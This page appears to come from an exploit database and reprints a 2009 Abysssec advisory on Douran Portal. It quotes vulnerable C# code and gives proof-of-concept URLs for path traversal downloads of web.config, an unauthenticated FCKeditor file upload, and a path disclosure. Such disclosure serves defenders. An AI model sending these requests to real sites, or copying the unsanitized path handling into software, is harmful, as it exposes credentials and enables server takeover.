header-logo
Suggest Exploit
vendor:
Portal
by:
Abysssec Inc
8,8
CVSS
HIGH
File Download Vulnerability
434
CWE
Product Name: Portal
Affected Version From: DOURAN Portal <= V3.9.0.23
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Douran Portal Multiple Remote Vulnerabilities

The Douran Portal is vulnerable to a file download vulnerability due to improper validation of user-supplied input. An attacker can exploit this vulnerability by sending a specially crafted request to the vulnerable application. This can allow an attacker to download any file from the web server, including sensitive files such as web.config, which can contain database credentials and other sensitive information.

Mitigation:

Ensure that user-supplied input is properly validated and sanitized before being used in the application.
Source

Exploit-DB raw data:

Abysssec Inc Public Advisory

Description : 

these vulnerabilites found one year ago and new version of this portal "is not" affect whith these vulnerabilites anymore 
but still lots of web site uses of old version and are vulnerable and also new version is not "fully secure" . so because of patching there 
is no point to keep these private anymore these vulnerabities are just for educational purpose and author will be not be responsible 
for any damage using this vulnerabiltes .

Discovery : www.Abysssec.com 

Title  : Douran Portal Multiple Remote Vulnerabilities
Affected Version : DOURAN Portal   <= V3.9.0.23
Vendor  Site   : www.douran.com



Vulnerabilites : 


1- File Download Vulnerbility in /Admin/ImportExport/download.aspx

Vulnerable Code :


		string strFileName = Request.Params["Filename"];
		if((strFileName != null) && (strFileName != ""))
		{
			string strPath = Server.MapPath("../../_DouranPortal/ExportPortal");
			strPath += "\\" + strFileName; // Vulnerablity
			if(System.IO.File.Exists(strPath))
			{
				Response.Clear();
				Response.ContentType = "application/octet-stream";
				Response.AddHeader("Content-Transfer-Encoding", "binary");
				Response.AddHeader("Content-Disposition", "attachment; filename=\"" + strFileName + "\"");
				Response.Flush();
				Response.WriteFile(strPath);
				Response.End();

			.....


PoC : http://www.vulnerable.com/Admin/ImportExport/Download.aspx?filename=../../web.config



2- File Download Vulnerbility in /download.aspx

Vulnerable Code :


	string fileNameAttach = Request.Params["FileNameAttach"];
	string filePathAttach = Request.Params["FilePathAttach"];
	string originalAttachFileName = Request.Params["OriginalAttachFileName"];
	if((fileNameAttach != null) && (filePathAttach != ""))
	{
		string strPath = Server.MapPath(filePathAttach + "/" + fileNameAttach); // Vulnerable
		if(System.IO.File.Exists(strPath))
		{
			System.IO.Stream iStream = null;

			// Buffer to read 1 mega bytes in chunk:
			int segmentLegthToRead = 1024 * 1024;
			byte[] buffer = new Byte[segmentLegthToRead];
		......

PoC : http://www.vulnerable.com/download.aspx?FileNameAttach=/web.config

3- File Upload Vulnerability DesktopModules/fck/editor

Vulnerablity : 

Using Fckeditor without any authentication will give ability to attacker to
upload his / her own file and fckeditor won't check file extention
it will give ability to attacker upload a malicius server side ASP / ASPX / PHP  / JSP .
so this vulnerability can creation access to server / portal completely .

PoC : http://www.vulnerable.com/DesktopModules/fck/editor/filemanager/upload/test.html


4-Path Disclosure Vulnerablity In DesktopModules/DesktopCalendar/HZAN_pickercal.aspx

Vulnerable Code : 

Calendar1.FullWidth = true;
	Calendar1.BigCaledar = bool.Parse((string)Request.QueryString["calsize"]);
	if (!IsPostBack) 
	{
		Calendar1.Date = new DateTime(long.Parse((string)Request.QueryString["curd"]));
		Calendar1.CalendarCulture = (HZAN.Calendar.CultureType)Enum.Parse(typeof(HZAN.Calendar.CultureType),(string)Request.QueryString["culture"]);
		seldate = Calendar1.Date.ToShortDateString();
		ChangeSelDate1();
	}


PoC : http://www.vulnerable.com/DesktopModules/DesktopCalendar/HZAN_pickercal.aspx?calsize='


Final Note : for advanced security topics / sharing idea and etc ... please feel free to contact me at  : admin [at] abysssec.com

# milw0rm.com [2009-05-18]